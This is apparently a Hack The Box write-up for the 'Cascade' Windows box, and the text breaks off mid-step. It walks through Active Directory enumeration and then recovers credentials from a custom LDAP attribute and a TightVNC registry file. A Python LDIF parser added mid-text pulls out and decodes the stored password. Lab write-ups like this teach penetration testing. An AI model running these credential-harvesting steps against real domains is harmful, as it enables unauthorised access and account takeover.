Cascade

This is a Windows machine from Hack The Box.

Nmap scan

└─$ nmap -sV -sC -oA cascade 10.10.10.182
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-11 05:46 EDT
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.97 seconds
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/cascade]
└─$ nmap -sV -sC -oA cascade 10.10.10.182 -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-11 05:47 EDT
Nmap scan report for 10.10.10.182
Host is up (0.38s latency).
Not shown: 991 filtered tcp ports (no-response)
PORT      STATE SERVICE           VERSION
88/tcp    open  kerberos-sec      Microsoft Windows Kerberos (server time: 2023-09-11 09:48:13Z)
389/tcp   open  ldap              Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
636/tcp   open  tcpwrapped
3268/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
49154/tcp open  msrpc             Microsoft Windows RPC
49155/tcp open  msrpc             Microsoft Windows RPC
49157/tcp open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc             Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 171.22 seconds
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/cascade]
└─$ 

crackmapexec

└─$ crackmapexec smb  10.10.10.182  -u "" up ""
SMB         10.10.10.182    445    CASC-DC1         [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/cascade]
└─$ crackmapexec smb 10.10.10.182 --shares     
SMB         10.10.10.182    445    CASC-DC1         [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB         10.10.10.182    445    CASC-DC1         [-] Error enumerating shares: STATUS_USER_SESSION_DELETED
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/cascade]

rpcclient

Password for [WORKGROUP\]:
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/cascade]
└─$ 

Add cascade.local to the hosts file:

127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
10.10.10.175    EGOTISTICAL-BANK.LOCAL
10.10.10.100    active.htb  htb
10.10.10.161    htb.local
10.10.10.192    blackfield.local
10.10.10.182    cascade.local

Do an LDAP search:

kali@kali ~/H/cascade> ldapsearch -x -H ldap://10.10.10.182 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingContexts: DC=cascade,DC=local
namingContexts: CN=Configuration,DC=cascade,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=cascade,DC=local
namingContexts: DC=DomainDnsZones,DC=cascade,DC=local
namingContexts: DC=ForestDnsZones,DC=cascade,DC=local

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

kali@kali ~/H/cascade> ldapsearch -x -H ldap://10.10.10.182 -b 'DC=cascade,DC=local' -s sub '(objectClass=person)' sAMAccountName | grep 'sAMAccountName:' | awk -F ': ' '{print $2}'
CascGuest
CASC-DC1$
arksvc
s.smith
r.thompson
util
j.wakefield
s.hickson
j.goodhand
a.turnbull
e.crowe
b.hanson
d.burman
BackupSvc
j.allen
i.croft
kali@kali ~/H/cascade> 

Output the users to a text file and add administrator to it:

administrator
arksvc
s.smith
r.thompson
util
j.wakefield
s.hickson
j.goodhand
a.turnbull
e.crowe
b.hanson
d.burman
BackupSvc
j.allen
i.croft
kali@kali ~/H/cascade> 

Use kerbrute to see which users are valid. They are all valid.

kali@kali ~/H/cascade> ./kerbrute userenum --dc 10.10.10.182 -d  cascade.LOCAL users.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 09/11/23 - Ronnie Flathers @ropnop

2023/09/11 06:36:48 >  Using KDC(s):
2023/09/11 06:36:48 >   10.10.10.182:88

2023/09/11 06:36:57 >  [+] VALID USERNAME:       [email protected]
2023/09/11 06:36:57 >  [+] VALID USERNAME:       [email protected]
2023/09/11 06:36:57 >  [+] VALID USERNAME:       [email protected]
2023/09/11 06:36:57 >  [+] VALID USERNAME:       [email protected]
2023/09/11 06:36:57 >  [+] VALID USERNAME:       [email protected]
2023/09/11 06:36:57 >  [+] VALID USERNAME:       [email protected]
2023/09/11 06:36:57 >  [+] VALID USERNAME:       [email protected]
2023/09/11 06:36:57 >  [+] VALID USERNAME:       [email protected]
2023/09/11 06:36:57 >  [+] VALID USERNAME:       [email protected]
2023/09/11 06:37:03 >  [+] VALID USERNAME:       [email protected]
2023/09/11 06:37:03 >  [+] VALID USERNAME:       [email protected]
2023/09/11 06:37:04 >  [+] VALID USERNAME:       [email protected]
2023/09/11 06:37:04 >  Done! Tested 15 usernames (12 valid) in 15.881 seconds
kali@kali ~/H/cascade> 

We loop over this file and check whether we can get an AS-REP hash for any of the users, but we get nothing:

└─$ while read -r user; do
    ./GetNPUsers.py cascade.LOCAL/$user -no-pass -dc-ip 10.10.10.182
done < /home/kali/HTB/cascade/users.txt

Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for administrator
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for arksvc
[-] User arksvc doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for s.smith
[-] User s.smith doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for r.thompson
[-] User r.thompson doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for util
[-] User util doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for j.wakefield
[-] User j.wakefield doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for s.hickson
[-] User s.hickson doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for j.goodhand
[-] User j.goodhand doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for a.turnbull
[-] User a.turnbull doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for e.crowe
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for b.hanson
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for d.burman
[-] User d.burman doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for BackupSvc
[-] User BackupSvc doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for j.allen
[-] User j.allen doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for i.croft
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)

enum4linux gives nothing:

kali@kali ~/H/cascade> enum4linux  -S 10.10.10.182
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Sep 11 06:45:06 2023

 =========================================( Target Information )=========================================

Target ........... 10.10.10.182
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ============================( Enumerating Workgroup/Domain on 10.10.10.182 )============================


[E] Can't find workgroup/domain



 ===================================( Session Check on 10.10.10.182 )===================================


[+] Server 10.10.10.182 allows sessions using username '', password ''


 ================================( Getting domain SID for 10.10.10.182 )================================

Domain Name: CASCADE
Domain Sid: S-1-5-21-3332504370-1206983947-1165150453

[+] Host is part of a domain (not a workgroup)


 =================================( Share Enumeration on 10.10.10.182 )=================================

do_connect: Connection to 10.10.10.182 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 10.10.10.182

enum4linux complete on Mon Sep 11 06:45:30 2023

kali@kali ~/H/cascade> 

Also tried this:

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py -dc-ip 10.10.10.182 -request 'cascade.local/'
Impacket v0.11.0 - Copyright 2023 Fortra

No entries found!
                                                                                                        
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ 

We are going to try brute forcing to get a password.

Checking the password policy first:


└─$ crackmapexec smb 10.10.10.182 --pass-pol

SMB         10.10.10.182    445    CASC-DC1         [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB         10.10.10.182    445    CASC-DC1         [+] Dumping password info for domain: CASCADE
SMB         10.10.10.182    445    CASC-DC1         Minimum password length: 5
SMB         10.10.10.182    445    CASC-DC1         Password history length: None
SMB         10.10.10.182    445    CASC-DC1         Maximum password age: Not Set
SMB         10.10.10.182    445    CASC-DC1         
SMB         10.10.10.182    445    CASC-DC1         Password Complexity Flags: 000000
SMB         10.10.10.182    445    CASC-DC1             Domain Refuse Password Change: 0
SMB         10.10.10.182    445    CASC-DC1             Domain Password Store Cleartext: 0
SMB         10.10.10.182    445    CASC-DC1             Domain Password Lockout Admins: 0
SMB         10.10.10.182    445    CASC-DC1             Domain Password No Clear Change: 0
SMB         10.10.10.182    445    CASC-DC1             Domain Password No Anon Change: 0
SMB         10.10.10.182    445    CASC-DC1             Domain Password Complex: 0
SMB         10.10.10.182    445    CASC-DC1         
SMB         10.10.10.182    445    CASC-DC1         Minimum password age: None
SMB         10.10.10.182    445    CASC-DC1         Reset Account Lockout Counter: 30 minutes 
SMB         10.10.10.182    445    CASC-DC1         Locked Account Duration: 30 minutes 
SMB         10.10.10.182    445    CASC-DC1         Account Lockout Threshold: None
SMB         10.10.10.182    445    CASC-DC1         Forced Log off Time: Not Set
                                                                                                        
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ 


Note this line in the output: Account Lockout Threshold: None

Brute forcing will require us to create a short list.

Going back to the LDAP search.

LDAP search listing all objects, with the attribute names counted:

kali@kali ~/H/cascade> ldapsearch -x -H ldap://10.10.10.182 -b 'DC=cascade,DC=local' -s sub | awk '{print $1}' | sort | uniq -c | sort -nr

   1109 dSCorePropagationData:
    518 objectClass:
    263 #
    254 
    249 dn:
    226 whenCreated:
    226 whenChanged:
    226 uSNCreated:
    226 uSNChanged:
    226 objectGUID::
    226 objectCategory:

Found a custom attribute called cascadeLegacyPwd:

   1 C-DC1,OU=Domain
      1 cascadeLegacyPwd:

Doing an ldapsearch to pair each username with this custom attribute:

kali@kali ~/H/cascade> ldapsearch -x -H ldap://10.10.10.182 -b 'DC=cascade,DC=local' -s sub '(objectClass=person)' sAMAccountName cascadeLegacyPwd | awk -F ': ' '/sAMAccountName/ { username=$2 } /cascadeLegacyPwd/ { print username ": " $2 }'
sAMAccountName cascadeLegacyPwd : sAMAccountName cascadeLegacyPwd 
r.thompson: clk0bjVldmE=
kali@kali ~/H/cascade> 

This looks like base64, since it ends with = padding.

Decoding this with ChatGPT gives clk4n5eva, and the command it suggested to decode it is `echo "clk0bjVldmE=" | base64 -d`. ChatGPT's decoded value was actually wrong:

kali@kali ~/H/cascade> echo "clk0bjVldmE=" | base64 -d
rY4n5eva⏎
kali@kali ~/H/cascade> 
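As an added example (not part of the write-up), here is a small Python parser for the LDIF that ldapsearch prints. It does what the awk pipelines above do, but in one place: counts attribute names, flags any attribute outside a baseline of stock AD user attributes, and pairs sAMAccountName with cascadeLegacyPwd and base64-decodes it. The sample LDIF, its DNs and its objectGUID are constructed; only the r.thompson value is the one from the box.

```python
import base64
from collections import Counter

# Constructed sample of ldapsearch LDIF output. DNs and objectGUID are made
# up; the r.thompson / cascadeLegacyPwd pair is the one found above. It has
# the three LDIF quirks a parser must handle: '#' comments, 'attr:: base64'
# values, and continuation lines that begin with a single space.
SAMPLE_LDIF = """\
# extended LDIF
# base <DC=cascade,DC=local> with scope subtree
#
dn: CN=r.thompson,CN=Users,DC=cascade,DC=local
objectClass: user
sAMAccountName: r.thompson
objectGUID:: AAECAwQFBgcICQoLDA0ODw==
cascadeLegacyPwd: clk0bjVldmE=

dn: CN=s.smith,CN=Users,DC=cascade,DC=local
objectClass: user
sAMAccountName: s.smith
description: Account description that the LDIF writer wrapped
  onto a second line

# search result
search: 2
result: 0 Success
"""

# Attributes expected on a stock AD user object (abridged). Anything outside
# this set is schema somebody added, which is where "legacy" secrets hide.
BASELINE_ATTRS = {
    "dn", "objectClass", "cn", "sn", "givenName", "name", "description",
    "distinguishedName", "instanceType", "whenCreated", "whenChanged",
    "uSNCreated", "uSNChanged", "objectGUID", "objectSid", "sAMAccountName",
    "sAMAccountType", "objectCategory", "dSCorePropagationData",
    "userAccountControl", "primaryGroupID", "memberOf", "userPrincipalName",
}


def parse_ldif(text):
    """Return a list of entries, each a dict attribute -> list of values.
    'attr:: <base64>' values are decoded to bytes; everything else is str."""
    lines = []                           # unfold continuation lines first
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    entries, current = [], None
    for line in lines:
        if line.startswith("#"):
            continue
        if not line.strip():             # blank line closes an entry
            if current:
                entries.append(current)
            current = None
            continue
        if line.startswith("dn:"):       # 'dn:' opens a new entry
            current = {}
        if current is None:              # trailer lines such as 'search: 2'
            continue
        name, _, value = line.partition(":")
        if value.startswith(":"):        # base64-encoded value
            current.setdefault(name, []).append(base64.b64decode(value[1:].strip()))
        else:
            current.setdefault(name, []).append(value.strip())
    if current:
        entries.append(current)
    return entries


def attribute_counts(entries):
    """The same numbers the awk | sort | uniq -c pipeline above produces."""
    counts = Counter()
    for entry in entries:
        for name, values in entry.items():
            counts[name] += len(values)
    return counts


def unusual_attributes(entries, baseline=BASELINE_ATTRS):
    """Attribute names present in the dump but missing from the baseline."""
    return set(attribute_counts(entries)) - baseline


def legacy_password_candidates(entries, attr="cascadeLegacyPwd"):
    """Map sAMAccountName -> (raw value, base64-decoded text or None)."""
    found = {}
    for entry in entries:
        if attr not in entry or "sAMAccountName" not in entry:
            continue
        raw = entry[attr][0]
        try:
            decoded = base64.b64decode(raw, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            decoded = None               # not base64, or not printable text
        found[entry["sAMAccountName"][0]] = (raw, decoded)
    return found
```

Feed it the saved output of the `-s sub` query above and `unusual_attributes` points straight at the custom attribute without eyeballing the uniq -c list.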

We try crackmapexec with both candidate passwords. WinRM fails for both, but SMB works with rY4n5eva:

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ crackmapexec winrm 10.10.10.182 -u r.thompson -p clk4n5eva       
SMB         10.10.10.182    5985   CASC-DC1         [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:cascade.local)
HTTP        10.10.10.182    5985   CASC-DC1         [*] http://10.10.10.182:5985/wsman
WINRM       10.10.10.182    5985   CASC-DC1         [-] cascade.local\r.thompson:clk4n5eva
                                                                                                                          
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ crackmapexec winrm 10.10.10.182 -u r.thompson -p rY4n5eva 
SMB         10.10.10.182    5985   CASC-DC1         [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:cascade.local)
HTTP        10.10.10.182    5985   CASC-DC1         [*] http://10.10.10.182:5985/wsman
WINRM       10.10.10.182    5985   CASC-DC1         [-] cascade.local\r.thompson:rY4n5eva
                                                                                                                          
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ crackmapexec smb 10.10.10.182 -u r.thompson -p rY4n5eva --shares
SMB         10.10.10.182    445    CASC-DC1         [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB         10.10.10.182    445    CASC-DC1         [+] cascade.local\r.thompson:rY4n5eva 
SMB         10.10.10.182    445    CASC-DC1         [+] Enumerated shares
SMB         10.10.10.182    445    CASC-DC1         Share           Permissions     Remark
SMB         10.10.10.182    445    CASC-DC1         -----           -----------     ------
SMB         10.10.10.182    445    CASC-DC1         ADMIN$                          Remote Admin
SMB         10.10.10.182    445    CASC-DC1         Audit$                          
SMB         10.10.10.182    445    CASC-DC1         C$                              Default share
SMB         10.10.10.182    445    CASC-DC1         Data            READ            
SMB         10.10.10.182    445    CASC-DC1         IPC$                            Remote IPC
SMB         10.10.10.182    445    CASC-DC1         NETLOGON        READ            Logon server share 
SMB         10.10.10.182    445    CASC-DC1         print$          READ            Printer Drivers
SMB         10.10.10.182    445    CASC-DC1         SYSVOL          READ            Logon server share 
                                                                                                                          
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]

We browse the Data share after connecting with smbclient and pull some files:

└─$ smbclient //10.10.10.182/data -U r.thompson%rY4n5eva
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jan 26 22:27:34 2020
  ..                                  D        0  Sun Jan 26 22:27:34 2020
  Contractors                         D        0  Sun Jan 12 20:45:11 2020
  Finance                             D        0  Sun Jan 12 20:45:06 2020
  IT                                  D        0  Tue Jan 28 13:04:51 2020
  Production                          D        0  Sun Jan 12 20:45:18 2020
  Temps                               D        0  Sun Jan 12 20:45:15 2020
cd 
                6553343 blocks of size 4096. 1624901 blocks available
smb: \> cd Contractors
smb: \Contractors\> ls
NT_STATUS_ACCESS_DENIED listing \Contractors\*
smb: \Contractors\> cd ../
smb: \> cd Finance
smb: \Finance\> ls
NT_STATUS_ACCESS_DENIED listing \Finance\*
smb: \Finance\> cd ../
smb: \> cd IT
smb: \IT\> ls
  .                                   D        0  Tue Jan 28 13:04:51 2020
  ..                                  D        0  Tue Jan 28 13:04:51 2020
  Email Archives                      D        0  Tue Jan 28 13:00:30 2020
  LogonAudit                          D        0  Tue Jan 28 13:04:40 2020
  Logs                                D        0  Tue Jan 28 19:53:04 2020
  Temp                                D        0  Tue Jan 28 17:06:59 2020

                6553343 blocks of size 4096. 1624901 blocks available
smb: \IT\> get Email Archives
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \IT\Email
smb: \IT\> cd Email Archives
cd \IT\Email\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \IT\> get LogonAudit
NT_STATUS_FILE_IS_A_DIRECTORY opening remote file \IT\LogonAudit
smb: \IT\> cd LogonAudit
smb: \IT\LogonAudit\> ls
  .                                   D        0  Tue Jan 28 13:04:40 2020
  ..                                  D        0  Tue Jan 28 13:04:40 2020

                6553343 blocks of size 4096. 1624642 blocks available
smb: \IT\LogonAudit\> cd ../
smb: \IT\> cd Logs
smb: \IT\Logs\> ls
  .                                   D        0  Tue Jan 28 19:53:04 2020
  ..                                  D        0  Tue Jan 28 19:53:04 2020
  Ark AD Recycle Bin                  D        0  Fri Jan 10 11:33:45 2020
  DCs                                 D        0  Tue Jan 28 19:56:00 2020

                6553343 blocks of size 4096. 1624642 blocks available
smb: \IT\Logs\> cd Ark AD Recycle Bin
cd \IT\Logs\Ark\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \IT\Logs\> cd "Ark AD Recycle Bin"
smb: \IT\Logs\Ark AD Recycle Bin\> ls
  .                                   D        0  Fri Jan 10 11:33:45 2020
  ..                                  D        0  Fri Jan 10 11:33:45 2020
  ArkAdRecycleBin.log                 A     1303  Tue Jan 28 20:19:11 2020

                6553343 blocks of size 4096. 1624900 blocks available
smb: \IT\Logs\Ark AD Recycle Bin\> get ArkAdRecycleBin.log
getting file \IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log of size 1303 as ArkAdRecycleBin.log (0.8 KiloBytes/sec) (average 0.8 KiloBytes/sec)
smb: \IT\Logs\Ark AD Recycle Bin\> cd ../
smb: \IT\Logs\> cd ../
smb: \IT\> cd "Email Archives"
smb: \IT\Email Archives\> ls
  .                                   D        0  Tue Jan 28 13:00:30 2020
  ..                                  D        0  Tue Jan 28 13:00:30 2020
  Meeting_Notes_June_2018.html       An     2522  Tue Jan 28 13:00:12 2020

                6553343 blocks of size 4096. 1624900 blocks available
smb: \IT\Email Archives\> get Meeting_Notes_June_2018.html
getting file \IT\Email Archives\Meeting_Notes_June_2018.html of size 2522 as Meeting_Notes_June_2018.html (1.5 KiloBytes/sec) (average 1.2 KiloBytes/sec)
smb: \IT\Email Archives\> 

Reading the content of the email:

└─$ cat Meeting_Notes_June_2018.html
<html>
<body lang=EN-GB link=blue vlink=purple style='tab-interval:36.0pt'>

<div class=WordSection1>

<p class=MsoNormal style='margin-left:120.0pt;text-indent:-120.0pt;tab-stops:
120.0pt;mso-layout-grid-align:none;text-autospace:none'><b><span
style='mso-bidi-font-family:Calibri;color:black'>From:<span style='mso-tab-count:
1'>&nbsp; </span></span></b><span
style='mso-bidi-font-family:Calibri;color:black'>Steve Smith
<o:p></o:p></span></p>

<p class=MsoNormal style='margin-left:120.0pt;text-indent:-120.0pt;tab-stops:
120.0pt;mso-layout-grid-align:none;text-autospace:none'><b><span
style='mso-bidi-font-family:Calibri;color:black'>To:<span style='mso-tab-count:
1'>&nbsp; </span></span></b><span
style='mso-bidi-font-family:Calibri;color:black'>IT (Internal)<o:p></o:p></span></p>

<p class=MsoNormal style='margin-left:120.0pt;text-indent:-120.0pt;tab-stops:
120.0pt;mso-layout-grid-align:none;text-autospace:none'><b><span
style='mso-bidi-font-family:Calibri;color:black'>Sent:<span style='mso-tab-count:
1'>&nbsp; </span></span></b><span
style='mso-bidi-font-family:Calibri;color:black'>14 June 2018 14:07<o:p></o:p></span></p>


<p class=MsoNormal style='margin-left:120.0pt;text-indent:-120.0pt;tab-stops:
120.0pt;mso-layout-grid-align:none;text-autospace:none'><b><span
style='mso-bidi-font-family:Calibri;color:black'>Subject:<span
style='mso-tab-count:1'>&nbsp; </span></span></b><span
style='mso-bidi-font-family:Calibri;color:black'>Meeting Notes<o:p></o:p></span></p>

<p><o:p>&nbsp;</o:p></p>

<p>For anyone that missed yesterday’s meeting (I’m looking at
you Ben). Main points are below:</p>

<p class=MsoNormal><o:p>&nbsp;</o:p></p>

<p>-- New production network will be going live on
Wednesday so keep an eye out for any issues. </p>

<p>-- We will be using a temporary account to
perform all tasks related to the network migration and this account will be deleted at the end of
2018 once the migration is complete. This will allow us to identify actions
related to the migration in security logs etc. Username is TempAdmin (password is the same as the normal admin account password). </p>

<p>-- The winner of the ‘Best GPO’ competition will be
announced on Friday so get your submissions in soon.</p>

<p class=MsoNormal><o:p>&nbsp;</o:p></p>

<p class=MsoNormal>Steve</p>


</div>

</body>

</html>

We see the username TempAdmin, whose password is said to be the same as the normal admin account's.

Try to get an AS-REP hash for it, but no luck; also tried with the users S.smith and Ben:

kali@kali ~/H/cascade> cd /usr/share/doc/python3-impacket/examples
kali@kali /u/s/d/p/examples> ./GetNPUsers.py cascade.LOCAL/TempAdmin
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Cannot authenticate TempAdmin, getting its TGT
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
kali@kali /u/s/d/p/examples> ./GetNPUsers.py cascade.LOCAL/S.smith
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Cannot authenticate S.smith, getting its TGT
[-] User S.smith doesn't have UF_DONT_REQUIRE_PREAUTH set
kali@kali /u/s/d/p/examples> ./GetNPUsers.py cascade.LOCAL/Ben
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Cannot authenticate Ben, getting its TGT
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
kali@kali /u/s/d/p/examples> 

We also look at the VNC registry file found in one of the folders (IT\Temp\s.smith):

smb: \> ls
  .                                   D        0  Sun Jan 26 22:27:34 2020
  ..                                  D        0  Sun Jan 26 22:27:34 2020
  Contractors                         D        0  Sun Jan 12 20:45:11 2020
  Finance                             D        0  Sun Jan 12 20:45:06 2020
  IT                                  D        0  Tue Jan 28 13:04:51 2020
  Production                          D        0  Sun Jan 12 20:45:18 2020
  Temps                               D        0  Sun Jan 12 20:45:15 2020
cd 
                6553343 blocks of size 4096. 1624895 blocks available
smb: \> cd IT
smb: \IT\> ls
  .                                   D        0  Tue Jan 28 13:04:51 2020
  ..                                  D        0  Tue Jan 28 13:04:51 2020
  Email Archives                      D        0  Tue Jan 28 13:00:30 2020
  LogonAudit                          D        0  Tue Jan 28 13:04:40 2020
  Logs                                D        0  Tue Jan 28 19:53:04 2020
  Temp                                D        0  Tue Jan 28 17:06:59 2020
cd 
                6553343 blocks of size 4096. 1624895 blocks available
smb: \IT\> cd Temp
smb: \IT\Temp\> ls
  .                                   D        0  Tue Jan 28 17:06:59 2020
  ..                                  D        0  Tue Jan 28 17:06:59 2020
  r.thompson                          D        0  Tue Jan 28 17:06:53 2020
  s.smith                             D        0  Tue Jan 28 15:00:01 2020

                6553343 blocks of size 4096. 1624895 blocks available
smb: \IT\Temp\> cd s.smith
smb: \IT\Temp\s.smith\> ls
  .                                   D        0  Tue Jan 28 15:00:01 2020
  ..                                  D        0  Tue Jan 28 15:00:01 2020
  VNC Install.reg                     A     2680  Tue Jan 28 14:27:44 2020

                6553343 blocks of size 4096. 1624895 blocks available
smb: \IT\Temp\s.smith\> get VNC Install.reg 
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \IT\Temp\s.smith\VNC
smb: \IT\Temp\s.smith\> get "VNC Install.reg"
getting file \IT\Temp\s.smith\VNC Install.reg of size 2680 as VNC Install.reg (1.7 KiloBytes/sec) (average 1.7 KiloBytes/sec)
smb: \IT\Temp\s.smith\> 

The VNC file:

└─$ cat VNC\ Install.reg            
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"QueryAcceptOnTimeout"=dword:00000000
"LocalInputPriorityTimeout"=dword:00000003
"LocalInputPriority"=dword:00000000
"BlockRemoteInput"=dword:00000000
"BlockLocalInput"=dword:00000000
"IpAccessControl"=""
"RfbPort"=dword:0000170c
"HttpPort"=dword:000016a8
"DisconnectAction"=dword:00000000
"AcceptRfbConnections"=dword:00000001
"UseVncAuthentication"=dword:00000001
"UseControlAuthentication"=dword:00000000
"RepeatControlAuthentication"=dword:00000000
"LoopbackOnly"=dword:00000000
"AcceptHttpConnections"=dword:00000001
"LogLevel"=dword:00000000
"EnableFileTransfers"=dword:00000001
"RemoveWallpaper"=dword:00000001
"UseD3D"=dword:00000001
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
"DisconnectClients"=dword:00000001
"PollingInterval"=dword:000003e8
"AllowLoopback"=dword:00000000
"VideoRecognitionInterval"=dword:00000bb8
"GrabTransparentWindows"=dword:00000001
"SaveLogToAllUsersPath"=dword:00000000
"RunControlInterface"=dword:00000001
"IdleTimeout"=dword:00000000
"VideoClasses"=""
"VideoRects"=""

                                                                                                                          
┌──(kali㉿kali)-[~/HTB/cascade]
└─$ 

ChatGPT gives this as ASCII: kÏ*KnZÊ, which doesn't look like a password.

From ChatGPT:

The value you provided seems to be from a registry key associated with TightVNC. TightVNC stores its passwords in the Windows Registry, and they're saved in a hashed (obfuscated) form, not plain text.

Given `"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f`, this looks like the registry entry for the TightVNC password. The hexadecimal value isn't the password itself but rather an encoded or hashed representation of it.

To get the actual password, you would typically need to decode or decrypt the hash, which requires specialized tools or scripts. There have been a few tools and scripts written for this purpose over the years. One of the well-known tools for this is `vncpwd`, which can decrypt VNC passwords stored in this way.

If you have access to the tool, you can use the extracted hex values to retrieve the password. Otherwise, there are also scripts available online in various programming languages that accomplish the same thing.

Keep in mind that interpreting or accessing information without proper authorization is illegal and unethical. Always make sure to have the necessary permissions when working with sensitive data or systems.

Got a decrypter: https://github.com/jeroennijhof/vncpwd

After running the tool, I was getting bad output:

┌──(kali㉿kali)-[~/HTB/cascade/vncpwd]
└─$ ./vncpwd vnc_hash.txt                                

Password: (�����
                                                                                                                          
┌──(kali㉿kali)-[~/HTB/cascade/vncpwd]
└─$ 

Checking with ChatGPT, it recommended this process:

echo -n "6bcf2a4b6e5aca0f" | xxd -r -p > vnc_hash.bin
./vncpwd vnc_hash.bin

And we get the password:

